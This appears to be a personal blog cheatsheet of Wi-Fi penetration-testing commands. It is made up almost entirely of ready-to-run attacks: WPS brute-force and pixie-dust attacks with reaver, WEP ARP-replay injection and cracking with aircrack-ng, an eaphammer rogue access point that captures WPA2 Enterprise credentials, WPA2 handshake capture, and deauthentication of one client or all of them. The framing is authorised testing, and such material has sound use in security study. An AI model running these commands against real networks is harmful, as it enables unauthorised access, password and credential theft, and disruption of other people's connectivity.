Wi-Fi Hacking Cheatsheet
A cheatsheet that contains all the commands that I have used quite often for Wi-Fi penetration tests.
Note: Basic knowledge of WiFi penetration testing is assumed.
Prepare for attack
Check for running processes and kill them:
sudo airmon-ng check kill
Start adapter to obtain the wlan0mon interface:
sudo airmon-ng start wlan0
# wlan0 is your wifi interface
Attacking WPS
Using the tool called wash:
wash -i wlan0mon
- Look at the tab
WPSwhich indicates the versions. - Versions available are: ‘1’, ‘2’:
- Version 2 is not vulnerable
- Version 1 is (if visible, continue the read)
WPS bruteforce attack
sudo reaver -b D3:4D:B3:37:13:37 -i wlan0mon
# Where '-b' is the BSSID of the AP)
Which would result in ‘completed’ and show the code for WPS.
WPS pixie attack
sudo reaver -b D3:4D:B3:37:13:37 -i wlan0mon -K
Does a pixie attack, and will result in changing a pin to a specified one from the attack.
Attacking WEP
WEP connecting
Note: the WEP format is 12:24:23:23
cat wpa_supplicant.conf
[..]
network={
ssid="wifi-old"
key_mgmt=NONE
wep_key0=12242323
wep_tx_keyidx=0
}
And connect to it with
sudo wpa_supplicant -i wlan0 -c wpa_supplicant.conf
Obtain the DHCP:
sudo dhclient wlan0
Sending traffic method
airodump-ng -c 6 —bssid D3:4D:B3:37:13:37 -w wep-out wlan0mon
We don’t want to wait for packages, so we send them ourselves:
aireplay-ng -3 -b D3:4D:B3:37:13:37 -h <client mac> wlan0mon
-3is a flag for ‘arp replay’ attack.
Cracking using aircrack-ng
Once this attack is started, it will send a bunch of packets. Wait for ~10.000 data requests. Then crack it using aircrack-ng :
aircrack-ng <.cap file> -w /usr/share/wordlists/rockyou.txt
Capture the auth method
sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel> wlan0mon
Send a fake authentication request:
sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>
And do a arp replay:
sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address> <interface_in_mointor_mode>
follow the same way of connection as mentioned above.
Attacking WPA2 Enterprise (EAP)
Run Eaphammer on 5Ghz using the following command:
sudo ./eaphammer -i wlan0 --essid 5GHZSSID --channel 48 --hw-mode a --channel-width 40 --creds
To run Eaphammer on 2.4Ghz, the following command can be executed:
sudo ./eaphammer -i wlan0 --essid 24GHZSSID --channel 1 --creds
To view more about this tool, see https://github.com/s0lst1c3/eaphammer.
Attacking WPA2 (PSK)
Start the dump of the network:
sudo airodump-ng wlan0mon
Find which got the most clients that you want to attack.
Start the dump on a specific BSSID
sudo airodump-ng -c 3 -w wpa --essid coolwifi --bssid D3:4D:B3:37:13:37 wlan0mon
Deauthenticating a client
sudo aireplay-ng -0 1 -a D3:4D:B3:37:13:37 -c <client mac) wlan0mon
Deauthenticating all clients
If you see clients, but none connect - I got the bad habit of just deauthenticating them all:
sudo aireplay-ng -0 10 -a D3:4D:B3:37:13:37
Cracking is done by the same method as mentioned above.
Attacking WPA2/3 (WPA3 with fallback to WPA2)
This is documented, you can find this at: https://tiem.io/posts/attacking-wpa3-failover/
Bypassing Client-Isolation
For more information on this, see: https://pulsesecurity.co.nz/articles/bypassing-wifi-client-isolation